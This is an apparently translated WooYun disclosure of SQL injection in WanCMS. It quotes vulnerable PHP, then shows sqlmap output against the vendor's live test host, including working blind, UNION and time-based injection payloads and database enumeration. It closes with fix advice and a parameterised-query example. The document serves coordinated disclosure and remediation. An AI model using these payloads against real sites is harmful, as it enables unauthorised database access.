
Vulnerability summary

Defect ID: wooyun-2014-049372

Title: WanCMS multiple SQL injections (source code analysis + live demonstration)

Vendor: wancms.com

Author: lxj616

Submitted: 2014-01-26 19:21

Fix time: 2014-04-26 19:22

Published: 2014-04-26 19:22

Type: SQL injection

Severity: high

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-01-26: Details sent to the vendor, awaiting vendor processing
2014-01-28: Vendor has confirmed; details disclosed to the vendor only
2014-01-31: Details opened to third-party security partners
2014-03-24: Details disclosed to core white hats and experts in related fields
2014-04-03: Details disclosed to regular white hats
2014-04-13: Details disclosed to intern white hats
2014-04-26: Details disclosed to the public

Brief description:

WanCMS has multiple SQL injection points. Injection has already been demonstrated on the official site and can leak the entire database (the demonstration stops at enumerating table names, which is sufficient).
One instance is analysed below, followed by a general fix recommendation.

Detailed description:

Analysis of one instance:
/app/Lib/Action/AccountsAction.class.php, line 570

// Preceding code omitted; this is inside public function forget_password_s()
$username = $_GET['username'];
// username is read straight from $_GET. Why not use the wrapper the framework provides?
$ucresult = uc_user_checkname($username);
if ($ucresult != '-3') {
    // Header("Location: /accounts/forget_password");
}
// Probably left over from testing; it has no effect
$this->assign('username', $username);
$member = M('member');
$u_info = $member->where("username ='" . $username . "'")->find();
// The line above concatenates username directly into the query, which is what causes the injection
$this->assign('u_info', $u_info);
$this->assign('username', $username);
// Remaining code omitted; not relevant to this vulnerability


Other injection locations:
/app/Lib/Action/LicenseAction.class.php, within the first few lines

public function search(){
    $domain = $_GET['domain'];
    $authorization = M("authorization"); // instantiate the authorization model
    $info = $authorization->where("domain ='".$domain."'")->find();
    if(empty($info)){
        echo "document.write('<a href='http://demo.31wan.cn/license/'>未授权</a>')";
    }else{
        echo "document.write('已授权')";
    }
}


Once again a GET parameter goes straight into the query statement; the same reasoning applies in each case, doesn't it?
There are many more injection points of this kind, so I will not submit them one by one.
Below, sqlmap is used to enumerate tables. Only part of the table names are listed, but in theory all of the data could be retrieved.

Proof of vulnerability:

Demonstration:

C:\Users\Administrator>sqlmap.py -u "http://test4.31wan.cn/accounts/forget_password_s?username=lxj616" --tables


sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Place: GET
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=lxj616') AND 3329=3329 AND ('MGNe'='MGNe
Type: UNION query
Title: MySQL UNION query (NULL) - 20 columns
Payload: username=-5677') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71756c7171,0x6a6546534662544b6c64,0x7168676871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: username=lxj616') AND SLEEP(5) AND ('vuGA'='vuGA
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
Database: anzhuang
[38 tables]
Database: 3937
[30 tables]
Database: 31wanbbs
[293 tables]

Fix recommendation:

Use the security functions that your own framework already provides:

/**
 * Escapes the string when magic_quotes_gpc is off
 * @access public
 * @param string $string the string to process
 * @return string
 */
static public function addSlashes($string) {
    if (!get_magic_quotes_gpc()) {
        $string = addslashes($string);
    }
    return $string;
}
/**
 * Fetches a value from arrays such as $_POST, $_GET, $_COOKIE or $_REQUEST
 * @access public
 * @param string $string the string to process
 * @return string
 */
static public function getVar($string) {
    return Input::stripSlashes($string);
}
/**
 * Reverses the escaping when magic_quotes_gpc is on
 * @access public
 * @param string $string the string to process
 * @return string
 */
static public function stripSlashes($string) {
    if (get_magic_quotes_gpc()) {
        $string = stripslashes($string);
    }
    return $string;
}


Example: patching the first injection point

$username = Input::addSlashes($_GET['username']);
...
From this point on, every value that reaches the database is received through addSlashes
...
When the value must be output (an API, display, or wherever the raw data is needed):
$username_out = Input::stripSlashes($username);


It is recommended to audit the code carefully for similar injection points and fix them with a sound approach (the method above is for reference only).
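Both injection points above share one pattern, a GET value concatenated into a where() string, so the added example below (not WanCMS or ThinkPHP code) contrasts that pattern with the escaping approach of the fix above and with a bound parameter, which does not depend on magic_quotes or on every call site remembering to escape. It assumes PHP with PDO and uses an in-memory SQLite table in place of the MySQL `member` table; because SQLite doubles quotes rather than backslash-escaping them, the escaping variant uses the driver's own PDO::quote() where the report uses the MySQL-oriented addslashes().

```php
<?php
// Added example (not WanCMS or ThinkPHP code). It rewrites the lookup from
// AccountsAction::forget_password_s() three ways: the original string
// concatenation, driver-side escaping (the idea behind the addSlashes() fix),
// and a bound parameter. Assumption: PHP with PDO; an in-memory SQLite table
// stands in for the MySQL `member` table.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE member (id INTEGER PRIMARY KEY, username TEXT)");
// Constructed sample rows.
$db->exec("INSERT INTO member (username) VALUES ('lxj616'), ('admin')");

// 1. Vulnerable: the same shape as where("username ='" . $username . "'").
//    Any quote in $username becomes part of the SQL grammar.
function findUnsafe(PDO $db, string $username): array {
    $sql = "SELECT id, username FROM member WHERE username = '" . $username . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// 2. Escaped: what the report's addSlashes() patch aims at, done with the
//    driver's own quoting so the escape matches the backend's syntax
//    (addslashes() produces MySQL-style \' which SQLite would reject).
//    Still fragile: every call site must remember to do it.
function findEscaped(PDO $db, string $username): array {
    $sql = "SELECT id, username FROM member WHERE username = " . $db->quote($username);
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// 3. Bound parameter: the value never touches the SQL text, so no escaping
//    rule, connection charset or magic_quotes setting can change the query.
function findBound(PDO $db, string $username): array {
    $stmt = $db->prepare("SELECT id, username FROM member WHERE username = :u");
    $stmt->execute([':u' => $username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input: an ordinary name that happens to contain a quote.
$name = "o'brien";
try {
    findUnsafe($db, $name);
    echo "unsafe: query ran\n";
} catch (PDOException $e) {
    echo "unsafe: the quote broke the statement: " . $e->getMessage() . "\n";
}
printf("escaped: %d row(s) for %s\n", count(findEscaped($db, $name)), $name);
printf("bound:   %d row(s) for %s\n", count(findBound($db, $name)), $name);
printf("bound:   %d row(s) for lxj616\n", count(findBound($db, 'lxj616')));
```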

Copyright notice: please credit the source when reposting: lxj616@WooYun


Vulnerability response

Vendor response:

Severity: medium

Vulnerability rank: 10

Confirmed: 2014-01-28 13:46

Vendor reply:

The vendor will fix this as soon as possible. Sincere thanks to lxj616.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-04-28 02:20 | 小贱人 ( Passer-by | Rank:4 Vulnerabilities:3 | veteran newbie, )

    mark